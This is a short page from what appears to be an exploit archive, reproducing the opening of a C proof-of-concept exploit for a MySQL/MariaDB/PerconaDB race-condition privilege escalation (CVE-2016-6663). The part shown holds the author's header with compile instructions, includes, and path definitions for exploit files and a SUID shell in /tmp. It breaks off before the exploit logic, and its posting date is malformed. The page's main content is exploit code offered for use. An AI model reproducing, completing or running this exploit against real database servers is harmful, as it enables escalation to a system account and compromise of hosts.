Home / exploits MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x 'mysql' System User Privilege Escalation
Posted on 30 November -0001
<HTML><HEAD><TITLE>MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x 'mysql' System User Privilege Escalation</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>/* Source: https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html // http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit mysql-privesc-race.c (ver. 1.0) CVE-2016-6663 / OCVE-2016-5616 Discovered/Coded by: Dawid Golunski dawid[at]legalhackers.com https://legalhackers.com Follow https://twitter.com/dawid_golunski for updates on this advisory. Compile: gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient Note: * On RedHat-based systems you might need to change /tmp to another public directory (e.g. /uploads) * For testing purposes only. Do no harm. Full advisory URL: https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html Video PoC: https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html */ #include <fcntl.h> #include <grp.h> #include <mysql.h> #include <pwd.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/inotify.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/wait.h> #include <time.h> #include <unistd.h> #define EXP_PATH "/tmp/mysql_privesc_exploit" #define EXP_DIRN "mysql_privesc_exploit" #define MYSQL_TAB_FILE EXP_PATH "/exploit_table.MYD" #define MYSQL_TEMP_FILE EXP_PATH "/exploit_table.TMD" #define SUID_SHELL EXP_PATH "/mysql_suid_shell.MYD" #define MAX_DELAY 1000 // can be used in the race to adjust the timing if necessary MYSQL *conn; // DB handles MYSQL_RES *res; MYSQL_ROW row; unsigned long cnt; void intro() { printf( "